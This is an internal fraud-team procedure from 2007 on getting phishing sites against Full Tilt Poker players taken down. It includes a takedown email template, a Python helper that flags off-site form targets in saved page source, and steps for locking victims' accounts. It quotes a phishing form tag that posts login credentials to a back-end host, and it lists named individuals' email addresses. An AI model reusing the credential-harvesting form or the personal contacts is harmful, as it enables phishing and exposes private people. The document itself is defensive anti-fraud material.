1. Tiltproof Incorporated
Document No. 5.16.1
Effective Date 04/27/2007
Handling a New Hoax Site
Revision Date 07/27/2007
Approval GN
1.0 Purpose: This document establishes how to handle a new hoax site.
2.0 Persons Affected:
1) Supervisors and above.
3.0 Forms, Checklists, Flowchart:
1) Printable version: tpfs1nwworkflow$HANDBOOKPrint Versions5.16.1 Handling a New Hoax Site.doc
4.0 Policy:
5.0 Procedure:
A) Reporting a New Hoax Site
1) Alert the Hoax Team at <hoaxteam@tiltproof.ca> and CC
<supervisors@tiltproof.ca> immediately if you become aware of a
new hoax website.
2) A member of the Hoax Team or a Supervisor will do the following.
3) Go to <www.dnsstuff.com> and enter the web address into the
“WHOIS” and “Abuse Lookup” fields.
4) Find out who is hosting the website, most likely Yahoo. Select “get
results with the E-mail addresses” to find the contact email address
for the hosting site.
5) Send the template email below to the contact email address/es with
the appropriate CC: from the Fraudoperations@fulltiltpoker.com
email address, and BCC: pmclaughlin@pocketkings.ie. (You should
never send email to any non-Tiltproof or non-Pocket Kings party
from your personal Tiltproof.ca address.)
6) Follow the steps below while waiting for a reply (Section B).
7) Once you receive a reply from the company hosting the site saying
that the website has been removed, please forward to
<supsopsscsrs@tiltproof.ca>, <iimrich@ijilaw.com>,
<fraudsquad@tiltproof.ca> if they weren’t CC:ed in the reply.
a) CC the specific processor if the hoax site was asking for the
particular processor's account numbers. These are
INTERNAL and not to be given to players.
NETELLER <Investigations@neteller.com>
MyWebATM <charles@opusfinancials.com>
ePassporte <brian.branam@epassporte.com> and
<annelies.manuel@epassporte.com>
Click2Pay <martin.osterloh@wirecard.com>
B) Procedure to Follow While Waiting for a Reply
1) Alert the Supervisor to get a message out to the current shift about
the site, and to suggest they review the PR document in the
handbook about handling responses to hoax emails.
C) Supervisor’s Procedure to Follow While Waiting for a Reply
1) Assign someone to run a chat scan for the hoax website every 5-10
minutes.
Run the ChatScan macro or manually do this by typing
FTT_Followd chatscan 1 ".com" 1>chatscan.txt into the
command prompt
2) Add the hoax website to the
Announcements Page
Huddle Notes
[S:FTP_Fraud_DepartmentHoaxHoax Site Log.xls]
White Boards (if needed)
D) Email Template
To: (If Yahoo) <reportabuse@yahoo-inc.com>, <abuse@yahoo-inc.com>,
<copyright@yahoo-inc.com>, <domains-abuse@cc.yahoo-inc.com>
Cc: <supsopsscsrs@tiltproof.ca>, <iimrich@ijilaw.com>,
<hoaxteam@tiltproof.ca>, the processors should be CC’d when appropriate.
Content:
Hello,
It has come to our attention that you may be hosting a site which is attempting
to defraud customers of FullTiltPoker.com.
Please review your hosting for: _____________________
XXXFOR SCAM SITESXXX
This is a site which is attempting to "scam" users' passwords for their
FullTiltPoker logins, as well as many transaction processor websites
(essentially online banks) such as NETELLER, ePassporte, PayPal, and
Moneybookers. The site is also in breach of copyright laws.
XXXFOR KEYLOGGING SITESXXX
This site attempts to install malicious key-logging software onto unsuspecting
players' computers and is in breach of copyright laws.
We request that you remove the offending site as expeditiously as possible.
Please contact us with any concerns or questions.
Thank you for your prompt cooperation in this matter.
********NAME********
On behalf of Full Tilt Poker
E) Finding a Back End Server Location
1) Open the suspected hoax site
2) Right click the webpage
3) Select “View”
4) Select “Source” or “View Source” to bring it up in text form.
5) Save a copy of this in [S: FTP_Fraud_DepartmentHOAXScam
Website Source Code] with the same name as the web address:
Scam-websitedotcom.txt
6) If it is similar to our previous scam websites, it will have a “form”
that sends information to another website. It will look similar to this:
<form
action="http://00642EF.NETSOLHOST.COM/login.php"
method="post">
7) Follow the steps in “Reporting a New Hoax Site” with the web
address located next to form action.
<http://00642EF.NETSOLHOST.COM/login.php>
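Steps 4 to 7 above can be checked mechanically against the saved source file. The following is an added example, not part of the original procedure: it parses saved page source, resolves each form action against the front-end address, and returns the targets hosted on a different host, which are the ones to report. The function names and the sample page are constructed for illustration; the form tag is the one shown in step 6.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormActionParser(HTMLParser):
    """Collect (action, method) for every <form> tag in saved page source."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag == "form":
            a = dict(attrs)
            self.forms.append((a.get("action") or "", (a.get("method") or "get").lower()))


def backend_targets(page_url, source):
    """Return form targets whose host differs from the front-end site's host."""
    parser = FormActionParser()
    parser.feed(source)
    front_host = (urlsplit(page_url).hostname or "").lower()
    hits = []
    for action, method in parser.forms:
        target = urljoin(page_url, action)  # resolves relative actions
        host = (urlsplit(target).hostname or "").lower()
        if host and host != front_host:
            hits.append({"url": target, "host": host, "method": method})
    return hits


# Constructed sample: a front-end page with one same-site form and the
# off-site form tag quoted in step 6 of the procedure.
SAMPLE_URL = "http://www.500free-fulltiltpoker.com/"
SAMPLE_SOURCE = """
<html><body>
<form action="/search" method="get"><input name="q"></form>
<form
action="http://00642EF.NETSOLHOST.COM/login.php"
method="post">
<input name="user"><input name="pass" type="password">
</form>
</body></html>
"""

if __name__ == "__main__":
    for hit in backend_targets(SAMPLE_URL, SAMPLE_SOURCE):
        print(hit["method"].upper(), hit["url"], "-> report host:", hit["host"])
```

Each returned host is a separate address to take through “Reporting a New Hoax Site”, since the back end is usually hosted by a different company than the front end.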
F) Investigating Players Affected by the Hoax Site
1) Create a new folder in [S:FTP_Fraud_DepartmentHOAX2007]
named [Hoax Site mm yy]
Investigators save their know100s and all related files in this
folder.
2) Start a spreadsheet tracker for all victims of this new hoax site.
G) Spreadsheet “Account Security/Limits” Section
1) Confirm that the player's account is clean with no foreign logins.
2) Open their account in WAT.
a) Select the “Security & Limits” tab.
b) Select “No Play”, “No Mixed Games”, “No Chat”, “No Deposit”
and “No Transfer” for added security.
c) Select “Submit.”
3) Email the player requesting that they reset their password and contact us
back immediately.
4) Once the player writes back we can reinstate their account fully, and
give them back all privileges to the account.
5) In the spreadsheet, highlight the player's account green once they have
confirmed that the password has been changed and the playing rights
have been given back.
6.0 Definitions:
Back End Server = what the recent (Feb 2006) scammer used to record all
of the account particulars. Basically, there is the front-end
website, which is where they direct everyone to go
(www.500free-fulltiltpoker.com). Once they enter the
information, they are redirected to another website that is
hosted by a different company and is invisible to the human
eye. This is a form of disguise by the scammer to prolong the
exposure of the website, and it also protects the
information the hoaxer has received for a longer period of
time.
7.0 Revision History:
July 27/07
BCC pmclaughlin@
July 20/07
New Fraud Team email addresses and folders
Edit to email template
Added more restrictions to accounts in G)
July 5/07
New Yahoo email added to template
June 19/07
Send emails from the Operations addy
April 24/07
Email supsopsscsrs not management. Email processors when needed.
Template altered.
April 12/07